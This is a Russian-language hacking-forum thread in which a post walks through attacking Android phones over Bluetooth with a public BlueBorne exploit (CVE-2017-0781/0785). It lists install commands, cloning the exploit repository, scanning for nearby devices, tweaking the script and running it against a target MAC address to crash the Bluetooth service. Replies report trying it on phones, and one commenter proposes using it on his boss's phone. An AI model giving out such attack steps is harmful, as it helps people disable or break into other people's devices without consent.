Статья Blueborne. Переполнение буфера. Android

Всем привет! В этой статье, я хочу показать на практике применение уязвимости CVE-2017-0781. Работа этого эксплойта описана в документации к Blueborne.

Скрипт, который мы будем использовать, позволит осуществить переполнение буфера на целевом устройстве Android с последующим отказом в эксплуатации службы Bluetooth.

Версии Android OS подверженные уязвимости:

* Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0.

Установка зависимостей:

apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential

pip install --upgrade pip
pip install --upgrade pwntools

Установка pybluez:

apt-get install bluetooth libbluetooth-dev
pip install pybluez

Копируем эксплоит, себе:

> git clone https://github.com/ojasookert/CVE-2017-0781

Далее, сканируем эфир Bluetooth, и выбираем целевое устройство:

Копируем MAC-адрес. Перед запуском атаки, можно немного поправить сам скрипт, т.к. для полноценного выполнения, там стоит слишком маленькое значение. Меняем как на скриншоте.

И собственно, производим запуск скрипта:

В случае успеха на целевом устройстве, вы увидите следующее:

Спасибо за внимание, на этом пока все.

 

[nikos]

Как раз ждал когда тут напишут про этот эксплойт

 

[aza811]

Надо попробовать задосить телефон наначальника,нечего с блютуз гарнитурой ходить в ухе

 

[Dr.Lafa]

Ого, а я думал, что про bluborne и "крэк" уже забыли. Хотя rce в открытом досупе нет ни для первого, ни для второго

 

[Vander]

Ого, а я думал, что про bluborne и "крэк" уже забыли. Хотя rce в открытом досупе нет ни для первого, ни для второго

К сожалению, это только малая часть...

 

[adm2]

Можно ещё добавить BlueBorne Vulnerability Scanner для проверки своего девайса) хотя он мне показал что устройство "вулнерабле" к блуборну, но скрипт его не пока пробил)

 

[ghostphisher]

Тема злободневна - полей для деятельности куда выше чем смартфон: в авто системы мульмиедиа, фитнес трекеры в спортзалах - то и то в виде станции на базе андроид ( в авто среднего сегмента или самопалки - 99% планшет стоит основной консолью и на базе андроид ). Для кого тема важная, интересная, прошу не выражать пустые эмоции - пишите получилось ли лично самому по статье все исполнить.

 

[rink0]

Интересно как эту уязвимость можно еще использовать.
Автор расскажи в след. статье) пожалуйста)

 

[Ondrik8]

apt-get install bluetooth libbluetooth-dev

pip install pybluez

git clone https://github.com/ojasookert/CVE-2017-0785

python CVE-2017-785.py TARGET=<MAC ADDRESS of Target>

что это херь дает?)) не могу понять... 30 байт удаляет, откуда))?

 

[Vander]

apt-get install bluetooth libbluetooth-dev

pip install pybluez

git clone https://github.com/ojasookert/CVE-2017-0785

python CVE-2017-785.py TARGET=<MAC ADDRESS of Target>

Посмотреть вложение 13426

что это херь дает?)) не могу понять... 30 байт удаляет, откуда))?

Я понять тож не могу))

 

[Vander]

Хорош палить контору

На самом деле, есть довольно подробное описание этого скрипта. На практике его не применял

 

[rink0]

На самом деле, есть довольно подробное описание этого скрипта. На практике его не применял

можешь рассказать?)

 

[unit3]

apt-get install bluetooth libbluetooth-dev

pip install pybluez

git clone https://github.com/ojasookert/CVE-2017-0785

python CVE-2017-785.py TARGET=<MAC ADDRESS of Target>

Посмотреть вложение 13426

что это херь дает?)) не могу понять... 30 байт удаляет, откуда))?

Есть

Ссылка скрыта от гостей

, в которой описывается подробно что и как делать надо для того, чтобы все это работало. Из нее я вынес несколько моментов.
1. "To perform some of the following actions it is necessary to have root privileges on the phone." - нужен root
2. Для каждого телефона свои смещения по памяти. Переменные
likely_some_libc_blx_offset = result[X][X]
likely_some_bluetooth_default_global_var_offset = result[X][X]
и
BLUETOOTH_BSS_SOME_VAR_OFFSE
LIBC_SOME_BLX_OFFSET
тому наглядное подтверждение.
3. Красивая картинка с дампом памяти - это тот участок, в котором, как я понял, и происходит переполнение буфера. Вот только сам адрес неизвестен.
P.S. Из этой статьи я понял что для каждого телефона смещения в памяти уникальны, и уязвимость не будет работать из "коробки".
[doublepost=1511971560,1511971510][/doublepost]

можешь рассказать?)

Ссылка скрыта от гостей

 

[nerfy]

как сканируете эфир?

 

[Ondrik8]

как сканируете эфир?

kali > hcitool scan

 

[iYasha]

Спасибо за посты, вот у меня только один вопрос группа в телеге "Life-Hack [Жизнь-Взлом]/Хакерство/Hacking" (не реклама) https://t.me/Haccking она ворует от сюда посты или кто то специально создал группу из этого форума?

 

[P0ison butterfly]

пытался поставить на нетхантер на нексусе 5 , ошибки начали сыпаться .

 

[nerfy]

iphone 6s не смог пробить

 

[Ondrik8]

вот

Ссылка скрыта от гостей

интересное обсуждение данной уязвимости!

 

[Air7771]

Пока не вижу как эту уязвимость можно использовать, только вызвать отказ в работе блютуза и все... Что есть по интересней?